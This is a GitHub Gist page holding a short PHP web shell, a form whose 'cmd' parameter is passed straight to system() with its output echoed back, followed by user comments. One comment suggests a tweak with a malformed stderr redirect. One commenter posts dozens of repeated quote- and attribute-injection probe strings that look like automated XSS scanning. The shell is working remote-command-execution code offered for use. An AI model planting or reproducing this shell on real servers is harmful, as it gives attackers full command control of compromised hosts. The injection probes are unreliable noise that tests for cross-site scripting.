Skip to content

Instantly share code, notes, and snippets.

@joswr1ght
Last active July 17, 2025 07:43
Show Gist options
  • Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
@EphDoering
Copy link

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

@joswr1ght
Copy link
Author

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

Updated, thank you!

@rmdhfz
Copy link

rmdhfz commented Sep 6, 2021

Nice.....

@KnightChaser
Copy link

Thank you :) 👍

@1sm41l0
Copy link

1sm41l0 commented Apr 25, 2023

thanks

@unaiiM
Copy link

unaiiM commented Apr 26, 2023

better:

if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2&<1');
}

Adding 2&<1 you can see the error output.

@MSkhaliq
Copy link

'"></script>

GpZ9xu

@MSkhaliq
Copy link

'" rNnTRbt="roannATTR" x=yveepoB

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

05CrPC

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

AwKDWl

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

R9FxT5

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

PhtMv5

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

ro5B1T

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

YtzE5f

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

mlhKvP

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

ZcG29w

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

ptZkN2

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

Z1Eaq1

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

12ek3R

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

rggXyf

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

YT57dz

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

nZhHWE

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

m3fefe

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

rJQOpi

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

XfzUzq

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

lGCJUd

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

MWDi0j

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

JjgH81

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

qkkYo7

@MSkhaliq
Copy link

rNnTRbt=1 x=d'">

b6P304

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment